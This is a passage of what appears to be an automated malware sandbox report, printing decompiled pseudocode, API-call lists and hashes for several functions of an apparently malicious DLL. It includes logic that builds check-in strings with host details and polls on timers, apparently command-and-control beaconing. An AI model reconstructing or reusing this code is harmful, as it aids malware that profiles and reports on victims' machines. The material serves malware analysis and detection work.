				void* _t114;
				void* _t116;

				_t103 = __edx;
				_t29 = __eax;
				_t113 = _a20;
				_v4 = 8;
				if(__eax == 0) {
					_t29 = GetTickCount();
				}
				_t30 =  *0x10ca018; // 0x3639fe1b
				asm("bswap eax");
				_t31 =  *0x10ca014; // 0x3a87c8cd
				asm("bswap eax");
				_t32 =  *0x10ca010; // 0xd8d2f808
				asm("bswap eax");
				_t33 =  *0x10ca00c; // 0xeec43f25
				asm("bswap eax");
				_t34 =  *0x10ca320; // 0x26dd5a8
				_t3 = _t34 + 0x10cb633; // 0x74666f73
				_t109 = wsprintfA(_t113, _t3, 2, 0x3d170, _t33, _t32, _t31, _t30,  *0x10ca02c,  *0x10ca004, _t29);
				_t37 = E010C4B2C();
				_t38 =  *0x10ca320; // 0x26dd5a8
				_t4 = _t38 + 0x10cb673; // 0x74707526
				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
				_t116 = _t114 + 0x38;
				_t110 = _t109 + _t41;
				if(_a24 != 0) {
					_t92 =  *0x10ca320; // 0x26dd5a8
					_t8 = _t92 + 0x10cb67e; // 0x732526
					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t95; // executed
				}
				_t42 = E010C256F(_t99); // executed
				_t104 = _t42;
				if(_t104 != 0) {
					_t87 =  *0x10ca320; // 0x26dd5a8
					_t10 = _t87 + 0x10cb8d4; // 0x736e6426
					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t90;
					HeapFree( *0x10ca2d8, 0, _t104);
				}
				_t105 = E010C4B71();
				if(_t105 != 0) {
					_t82 =  *0x10ca320; // 0x26dd5a8
					_t12 = _t82 + 0x10cb8dc; // 0x6f687726
					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t85;
					HeapFree( *0x10ca2d8, 0, _t105);
				}
				_t106 =  *0x10ca3cc; // 0x37a95b0
				_a24 = E010C7729(0x10ca00a, _t106 + 4);
				_t46 =  *0x10ca36c; // 0x0
				if(_t46 != 0) {
					_t78 =  *0x10ca320; // 0x26dd5a8
					_t15 = _t78 + 0x10cb8b6; // 0x3d736f26
					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t81;
				}
				_t47 =  *0x10ca368; // 0x0
				if(_t47 != 0) {
					_t75 =  *0x10ca320; // 0x26dd5a8
					_t17 = _t75 + 0x10cb88d; // 0x3d706926
					wsprintfA(_t110 + _t113, _t17, _t47);
				}
				if(_a24 != 0) {
					_t50 = RtlAllocateHeap( *0x10ca2d8, 0, 0x800); // executed
					_t108 = _t50;
					if(_t108 != 0) {
						E010C53EC(GetTickCount());
						_t54 =  *0x10ca3cc; // 0x37a95b0
						__imp__(_t54 + 0x40);
						asm("lock xadd [eax], ecx");
						_t58 =  *0x10ca3cc; // 0x37a95b0
						__imp__(_t58 + 0x40);
						_t60 =  *0x10ca3cc; // 0x37a95b0
						_t61 = E010C18BA(1, _t103, _t113,  *_t60); // executed
						_t111 = _t61;
						asm("lock xadd [eax], ecx");
						if(_t111 != 0) {
							StrTrimA(_t111, 0x10c928c);
							_push(_t111);
							_t66 = E010C252A();
							_a12 = _t66;
							if(_t66 != 0) {
								_t97 = __imp__;
								 *_t97(_t111, _v0);
								 *_t97(_t108, _v4);
								_t98 = __imp__;
								 *_t98(_t108, _v0);
								 *_t98(_t108, _t111);
								_t72 = E010C1AA2(0xffffffffffffffff, _t108, _v24, _v20); // executed
								_v52 = _t72;
								if(_t72 != 0 && _t72 != 0x10d2) {
									E010C5F6A();
								}
								HeapFree( *0x10ca2d8, 0, _v16);
							}
							HeapFree( *0x10ca2d8, 0, _t111);
						}
						RtlFreeHeap( *0x10ca2d8, 0, _t108); // executed
					}
					HeapFree( *0x10ca2d8, 0, _a16);
				}
				HeapFree( *0x10ca2d8, 0, _t113);
				return _a12;
			}





















































                    0x010c68eb
                    0x010c68eb
                    0x010c68f1
                    0x010c68f7
                    0x010c68ff
                    0x010c6901
                    0x010c6901
                    0x010c690e
                    0x010c6919
                    0x010c691c
                    0x010c6927
                    0x010c692a
                    0x010c692f
                    0x010c6932
                    0x010c6937
                    0x010c693a
                    0x010c6946
                    0x010c6953
                    0x010c6955
                    0x010c695b
                    0x010c6960
                    0x010c696b
                    0x010c696d
                    0x010c6970
                    0x010c6977
                    0x010c6979
                    0x010c6982
                    0x010c698d
                    0x010c698f
                    0x010c6992
                    0x010c6992
                    0x010c6994
                    0x010c6999
                    0x010c699d
                    0x010c699f
                    0x010c69a4
                    0x010c69b0
                    0x010c69b2
                    0x010c69be
                    0x010c69c0
                    0x010c69c0
                    0x010c69cb
                    0x010c69cf
                    0x010c69d1
                    0x010c69d6
                    0x010c69e2
                    0x010c69e4
                    0x010c69f0
                    0x010c69f2
                    0x010c69f2
                    0x010c69f8
                    0x010c6a0b
                    0x010c6a0f
                    0x010c6a16
                    0x010c6a19
                    0x010c6a1e
                    0x010c6a29
                    0x010c6a2b
                    0x010c6a2e
                    0x010c6a2e
                    0x010c6a30
                    0x010c6a37
                    0x010c6a3a
                    0x010c6a3f
                    0x010c6a49
                    0x010c6a4b
                    0x010c6a53
                    0x010c6a66
                    0x010c6a6c
                    0x010c6a70
                    0x010c6a7c
                    0x010c6a81
                    0x010c6a8a
                    0x010c6a9b
                    0x010c6a9f
                    0x010c6aa8
                    0x010c6aae
                    0x010c6ab6
                    0x010c6abb
                    0x010c6ac8
                    0x010c6ace
                    0x010c6ada
                    0x010c6ae0
                    0x010c6ae1
                    0x010c6ae8
                    0x010c6aec
                    0x010c6af2
                    0x010c6af9
                    0x010c6b00
                    0x010c6b06
                    0x010c6b0d
                    0x010c6b11
                    0x010c6b1c
                    0x010c6b23
                    0x010c6b27
                    0x010c6b30
                    0x010c6b30
                    0x010c6b41
                    0x010c6b41
                    0x010c6b50
                    0x010c6b50
                    0x010c6b5f
                    0x010c6b5f
                    0x010c6b71
                    0x010c6b71
                    0x010c6b80
                    0x010c6b90

                    APIs
                    • GetTickCount.KERNEL32 ref: 010C6901
                    • wsprintfA.USER32 ref: 010C694E
                    • wsprintfA.USER32 ref: 010C696B
                    • wsprintfA.USER32 ref: 010C698D
                    • wsprintfA.USER32 ref: 010C69B0
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C69C0
                    • wsprintfA.USER32 ref: 010C69E2
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C69F2
                    • wsprintfA.USER32 ref: 010C6A29
                    • wsprintfA.USER32 ref: 010C6A49
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010C6A66
                    • GetTickCount.KERNEL32 ref: 010C6A76
                    • RtlEnterCriticalSection.NTDLL(037A9570), ref: 010C6A8A
                    • RtlLeaveCriticalSection.NTDLL(037A9570), ref: 010C6AA8
                      • Part of subcall function 010C18BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,010C6ABB,?,037A95B0), ref: 010C18E5
                      • Part of subcall function 010C18BA: lstrlen.KERNEL32(?,?,?,010C6ABB,?,037A95B0), ref: 010C18ED
                      • Part of subcall function 010C18BA: strcpy.NTDLL ref: 010C1904
                      • Part of subcall function 010C18BA: lstrcat.KERNEL32(00000000,?), ref: 010C190F
                      • Part of subcall function 010C18BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C192C
                    • StrTrimA.SHLWAPI(00000000,010C928C,?,037A95B0), ref: 010C6ADA
                      • Part of subcall function 010C252A: lstrlen.KERNEL32(037A9B50,00000000,00000000,7691C740,010C6AE6,00000000), ref: 010C253A
                      • Part of subcall function 010C252A: lstrlen.KERNEL32(?), ref: 010C2542
                      • Part of subcall function 010C252A: lstrcpy.KERNEL32(00000000,037A9B50), ref: 010C2556
                      • Part of subcall function 010C252A: lstrcat.KERNEL32(00000000,?), ref: 010C2561
                    • lstrcpy.KERNEL32(00000000,?), ref: 010C6AF9
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 010C6B00
                    • lstrcat.KERNEL32(00000000,?), ref: 010C6B0D
                    • lstrcat.KERNEL32(00000000,00000000), ref: 010C6B11
                      • Part of subcall function 010C1AA2: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 010C1B54
                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 010C6B41
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 010C6B50
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,037A95B0), ref: 010C6B5F
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C6B71
                    • HeapFree.KERNEL32(00000000,?), ref: 010C6B80
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                    • String ID: Ut
                    • API String ID: 1892477351-8415677
                    • Opcode ID: 5a706b15e34a9538cbb03840c69e391a72484d13af183b590494feb0cf1c1e00
                    • Instruction ID: e57821593d2bc3ce64575e079d5717cdc59fc21b019f72ff318f3450b31ee7e3
                    • Opcode Fuzzy Hash: 5a706b15e34a9538cbb03840c69e391a72484d13af183b590494feb0cf1c1e00
                    • Instruction Fuzzy Hash: 59719B71600219EFD7219B68DC48F9A3BE8FB48754F144228F9C9D3255EA3EE809DF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C2FC4 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 255memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E010C2FC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				void* _t93;
				void* _t98;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				intOrPtr _t136;
				int _t139;
				CHAR* _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t151;
				int _t152;
				void* _t153;
				intOrPtr _t154;
				void* _t156;
				long _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t165;
				void* _t166;
				void* _t168;

				_t151 = __edx;
				_t142 = __ecx;
				_t63 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x10ca018; // 0x3639fe1b
				asm("bswap eax");
				_t65 =  *0x10ca014; // 0x3a87c8cd
				_t140 = _a20;
				asm("bswap eax");
				_t66 =  *0x10ca010; // 0xd8d2f808
				asm("bswap eax");
				_t67 =  *0x10ca00c; // 0xeec43f25
				asm("bswap eax");
				_t68 =  *0x10ca320; // 0x26dd5a8
				_t3 = _t68 + 0x10cb633; // 0x74666f73
				_t152 = wsprintfA(_t140, _t3, 3, 0x3d170, _t67, _t66, _t65, _t64,  *0x10ca02c,  *0x10ca004, _t63);
				_t71 = E010C4B2C();
				_t72 =  *0x10ca320; // 0x26dd5a8
				_t4 = _t72 + 0x10cb673; // 0x74707526
				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
				_t168 = _t166 + 0x38;
				_t153 = _t152 + _t75;
				if(_a8 != 0) {
					_t136 =  *0x10ca320; // 0x26dd5a8
					_t8 = _t136 + 0x10cb67e; // 0x732526
					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t139; // executed
				}
				_t76 = E010C256F(_t142); // executed
				_t141 = __imp__; // 0x74e05520
				_a8 = _t76;
				if(_t76 != 0) {
					_t130 =  *0x10ca320; // 0x26dd5a8
					_t11 = _t130 + 0x10cb8d4; // 0x736e6426
					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t134;
					HeapFree( *0x10ca2d8, 0, _a8);
				}
				_t77 = E010C4B71();
				_a8 = _t77;
				if(_t77 != 0) {
					_t125 =  *0x10ca320; // 0x26dd5a8
					_t15 = _t125 + 0x10cb8dc; // 0x6f687726
					wsprintfA(_t153 + _a20, _t15, _t77);
					_t168 = _t168 + 0xc;
					HeapFree( *0x10ca2d8, 0, _a8);
				}
				_t154 =  *0x10ca3cc; // 0x37a95b0
				_t79 = E010C7729(0x10ca00a, _t154 + 4);
				_t160 = 0;
				_v16 = _t79;
				if(_t79 == 0) {
					L28:
					RtlFreeHeap( *0x10ca2d8, _t160, _a20); // executed
					return _v8;
				} else {
					_t82 = RtlAllocateHeap( *0x10ca2d8, 0, 0x800);
					_a8 = _t82;
					if(_t82 == 0) {
						L27:
						HeapFree( *0x10ca2d8, _t160, _v16);
						goto L28;
					}
					E010C53EC(GetTickCount());
					_t86 =  *0x10ca3cc; // 0x37a95b0
					__imp__(_t86 + 0x40);
					asm("lock xadd [eax], ecx");
					_t90 =  *0x10ca3cc; // 0x37a95b0
					__imp__(_t90 + 0x40);
					_t92 =  *0x10ca3cc; // 0x37a95b0
					_t93 = E010C18BA(1, _t151, _a20,  *_t92); // executed
					_t156 = _t93;
					_v24 = _t156;
					asm("lock xadd [eax], ecx");
					if(_t156 == 0) {
						L26:
						RtlFreeHeap( *0x10ca2d8, _t160, _a8); // executed
						goto L27;
					}
					StrTrimA(_t156, 0x10c928c);
					_push(_t156);
					_t98 = E010C252A();
					_v12 = _t98;
					if(_t98 == 0) {
						L25:
						HeapFree( *0x10ca2d8, _t160, _t156);
						goto L26;
					}
					_t161 = __imp__;
					 *_t161(_t156, _a4);
					 *_t161(_a8, _v16);
					_t162 = __imp__;
					 *_t162(_a8, _v12);
					_t104 = E010C5406( *_t162(_a8, _t156), _a8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v8 = 8;
						L23:
						E010C5F6A();
						L24:
						HeapFree( *0x10ca2d8, 0, _v12);
						_t160 = 0;
						goto L25;
					}
					_t108 = E010C22C7(_t141, 0xffffffffffffffff, _t156,  &_v20); // executed
					_v8 = _t108;
					if(_t108 == 0) {
						_t165 = _v20;
						_t115 = E010C1E51(_t165, _a4, _a12, _a16); // executed
						_v8 = _t115;
						_t116 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t165;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E010C17AB(_t165);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t110 = _a12;
							if(_t110 != 0) {
								_t157 =  *_t110;
								_t163 =  *_a16;
								wcstombs( *_t110,  *_t110,  *_a16);
								_t113 = E010C5D6F(_t157, _t157, _t163 >> 1);
								_t156 = _v24;
								 *_a16 = _t113;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E010C17AB(_a4);
							if(_v8 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}
























































                    0x010c2fc4
                    0x010c2fc4
                    0x010c2fc4
                    0x010c2fcf
                    0x010c2fd6
                    0x010c2fd8
                    0x010c2fd8
                    0x010c2fe5
                    0x010c2ff0
                    0x010c2ff3
                    0x010c2ff8
                    0x010c3001
                    0x010c3004
                    0x010c3009
                    0x010c300c
                    0x010c3011
                    0x010c3014
                    0x010c3020
                    0x010c302d
                    0x010c302f
                    0x010c3035
                    0x010c303a
                    0x010c3045
                    0x010c3047
                    0x010c304a
                    0x010c3050
                    0x010c3052
                    0x010c305a
                    0x010c3065
                    0x010c3067
                    0x010c306a
                    0x010c306a
                    0x010c306c
                    0x010c3073
                    0x010c3079
                    0x010c307c
                    0x010c307f
                    0x010c3084
                    0x010c3091
                    0x010c3093
                    0x010c3099
                    0x010c30a3
                    0x010c30a3
                    0x010c30a5
                    0x010c30ac
                    0x010c30af
                    0x010c30b2
                    0x010c30b7
                    0x010c30c4
                    0x010c30c6
                    0x010c30d4
                    0x010c30d4
                    0x010c30d6
                    0x010c30e4
                    0x010c30e9
                    0x010c30ed
                    0x010c30f0
                    0x010c32b1
                    0x010c32bb
                    0x010c32c4
                    0x010c30f6
                    0x010c3102
                    0x010c310a
                    0x010c310d
                    0x010c32a5
                    0x010c32af
                    0x00000000
                    0x010c32af
                    0x010c3119
                    0x010c311e
                    0x010c3127
                    0x010c3138
                    0x010c313c
                    0x010c3145
                    0x010c314b
                    0x010c3155
                    0x010c315a
                    0x010c3161
                    0x010c316a
                    0x010c3170
                    0x010c3299
                    0x010c32a3
                    0x00000000
                    0x010c32a3
                    0x010c317c
                    0x010c3182
                    0x010c3183
                    0x010c318a
                    0x010c318d
                    0x010c328f
                    0x010c3297
                    0x00000000
                    0x010c3297
                    0x010c3196
                    0x010c319d
                    0x010c31a5
                    0x010c31aa
                    0x010c31b3
                    0x010c31be
                    0x010c31c5
                    0x010c31c8
                    0x010c32c7
                    0x010c327b
                    0x010c327b
                    0x010c3280
                    0x010c328b
                    0x010c328d
                    0x00000000
                    0x010c328d
                    0x010c31d2
                    0x010c31d9
                    0x010c31dc
                    0x010c31e1
                    0x010c31ec
                    0x010c31f1
                    0x010c31f4
                    0x010c31fa
                    0x010c3200
                    0x010c3206
                    0x010c3209
                    0x010c320f
                    0x010c3212
                    0x010c3217
                    0x010c321b
                    0x010c321b
                    0x010c3227
                    0x010c3233
                    0x010c3237
                    0x010c3239
                    0x010c323e
                    0x010c3240
                    0x010c3245
                    0x010c324a
                    0x010c3257
                    0x010c325f
                    0x010c3262
                    0x010c3262
                    0x010c323e
                    0x00000000
                    0x010c3229
                    0x010c322d
                    0x010c3264
                    0x010c3267
                    0x010c3270
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c3270
                    0x010c322f
                    0x00000000
                    0x010c322f
                    0x010c3227

                    APIs
                    • GetTickCount.KERNEL32 ref: 010C2FD8
                    • wsprintfA.USER32 ref: 010C3028
                    • wsprintfA.USER32 ref: 010C3045
                    • wsprintfA.USER32 ref: 010C3065
                    • wsprintfA.USER32 ref: 010C3091
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C30A3
                    • wsprintfA.USER32 ref: 010C30C4
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C30D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010C3102
                    • GetTickCount.KERNEL32 ref: 010C3113
                    • RtlEnterCriticalSection.NTDLL(037A9570), ref: 010C3127
                    • RtlLeaveCriticalSection.NTDLL(037A9570), ref: 010C3145
                      • Part of subcall function 010C18BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,010C6ABB,?,037A95B0), ref: 010C18E5
                      • Part of subcall function 010C18BA: lstrlen.KERNEL32(?,?,?,010C6ABB,?,037A95B0), ref: 010C18ED
                      • Part of subcall function 010C18BA: strcpy.NTDLL ref: 010C1904
                      • Part of subcall function 010C18BA: lstrcat.KERNEL32(00000000,?), ref: 010C190F
                      • Part of subcall function 010C18BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C192C
                    • StrTrimA.SHLWAPI(00000000,010C928C,?,037A95B0), ref: 010C317C
                      • Part of subcall function 010C252A: lstrlen.KERNEL32(037A9B50,00000000,00000000,7691C740,010C6AE6,00000000), ref: 010C253A
                      • Part of subcall function 010C252A: lstrlen.KERNEL32(?), ref: 010C2542
                      • Part of subcall function 010C252A: lstrcpy.KERNEL32(00000000,037A9B50), ref: 010C2556
                      • Part of subcall function 010C252A: lstrcat.KERNEL32(00000000,?), ref: 010C2561
                    • lstrcpy.KERNEL32(00000000,?), ref: 010C319D
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 010C31A5
                    • lstrcat.KERNEL32(00000000,?), ref: 010C31B3
                    • lstrcat.KERNEL32(00000000,00000000), ref: 010C31B9
                      • Part of subcall function 010C5406: lstrlen.KERNEL32(?,00000000,037A9D58,00000000,010C3C77,037A9F7B,69B25F44,?,?,?,?,69B25F44,00000005,010CA00C,4D283A53,?), ref: 010C540D
                      • Part of subcall function 010C5406: mbstowcs.NTDLL ref: 010C5436
                      • Part of subcall function 010C5406: memset.NTDLL ref: 010C5448
                    • wcstombs.NTDLL ref: 010C324A
                      • Part of subcall function 010C1E51: SysAllocString.OLEAUT32(?), ref: 010C1E92
                      • Part of subcall function 010C1E51: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 010C1F14
                      • Part of subcall function 010C1E51: StrStrIW.SHLWAPI(?,006E0069), ref: 010C1F53
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 010C328B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 010C3297
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,037A95B0), ref: 010C32A3
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C32AF
                    • RtlFreeHeap.NTDLL(00000000,?), ref: 010C32BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                    • String ID: Ut
                    • API String ID: 3111183435-8415677
                    • Opcode ID: 61c48cf55fa533fb1ca2db045618be1176a2ca507617943edd1dcf770f9ea03d
                    • Instruction ID: f40bd76d8806c3f6ebdd5659479abfb7929900579d0af90d11f2c6ac497ab968
                    • Opcode Fuzzy Hash: 61c48cf55fa533fb1ca2db045618be1176a2ca507617943edd1dcf770f9ea03d
                    • Instruction Fuzzy Hash: 8D916971A00219EFDB21DFA8DC48A9E3BB9FF48754F148058F988D7250DB3A9951DFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C5458 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151timememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 10c5458-10c548a memset CreateWaitableTimerA 103 10c560b-10c5611 GetLastError 102->103 104 10c5490-10c54e9 _allmul SetWaitableTimer WaitForMultipleObjects 102->104 105 10c5615-10c561f 103->105 106 10c54ef-10c54f2 104->106 107 10c5573-10c5579 104->107 108 10c54fd 106->108 109 10c54f4 call 10c3399 106->109 110 10c557a-10c557e 107->110 111 10c5507 108->111 117 10c54f9-10c54fb 109->117 113 10c558e-10c5592 110->113 114 10c5580-10c5582 110->114 116 10c550b-10c5510 111->116 113->110 115 10c5594-10c559e CloseHandle 113->115 114->113 115->105 118 10c5512-10c5519 116->118 119 10c5523-10c5550 call 10c3a12 116->119 117->108 117->111 118->119 120 10c551b 118->120 123 10c55a0-10c55a5 119->123 124 10c5552-10c555d 119->124 120->119 125 10c55c4-10c55cc 123->125 126 10c55a7-10c55ad 123->126 124->116 127 10c555f-10c556f call 10c17c0 124->127 129 10c55d2-10c5600 _allmul SetWaitableTimer WaitForMultipleObjects 125->129 126->107 128 10c55af-10c55c2 call 10c5f6a 126->128 127->107 128->129 129->116 132 10c5606 129->132 132->107
                    C-Code - Quality: 83%
                    			E010C5458(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x10ca2e0);
					_v76 = 0;
					_v80 = 0;
					L010C818A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x10ca30c; // 0x2d4
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x10ca2ec = 5;
						} else {
							_t69 = E010C3399(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x10ca300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E010C3A12( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_t97 = _t66 - 3;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E010C17C0(_t75, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x10ca2e4);
							goto L21;
						} else {
							__eflags =  *0x10ca2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E010C5F6A();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x10ca2e8);
								L21:
								L010C818A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								__eflags = _t65;
								_v128 = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x10ca2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                    0x010c5458
                    0x010c546e
                    0x010c5472
                    0x010c5477
                    0x010c547e
                    0x010c5486
                    0x010c548a
                    0x010c5611
                    0x010c5490
                    0x010c5490
                    0x010c5492
                    0x010c5497
                    0x010c5498
                    0x010c549e
                    0x010c54a2
                    0x010c54a6
                    0x010c54b4
                    0x010c54c2
                    0x010c54c6
                    0x010c54c8
                    0x010c54d5
                    0x010c54e1
                    0x010c54e5
                    0x010c54e9
                    0x010c54f2
                    0x010c54fd
                    0x010c54fd
                    0x010c54f4
                    0x010c54f4
                    0x010c54fb
                    0x00000000
                    0x00000000
                    0x010c54fb
                    0x010c5507
                    0x00000000
                    0x010c550b
                    0x010c5510
                    0x010c551b
                    0x010c551b
                    0x010c5523
                    0x010c5529
                    0x010c5531
                    0x010c553a
                    0x010c5541
                    0x010c5545
                    0x010c554c
                    0x010c5550
                    0x00000000
                    0x00000000
                    0x010c5552
                    0x010c5556
                    0x010c5559
                    0x010c555d
                    0x00000000
                    0x010c555f
                    0x010c556f
                    0x010c556f
                    0x00000000
                    0x010c55a0
                    0x010c55a0
                    0x010c55a5
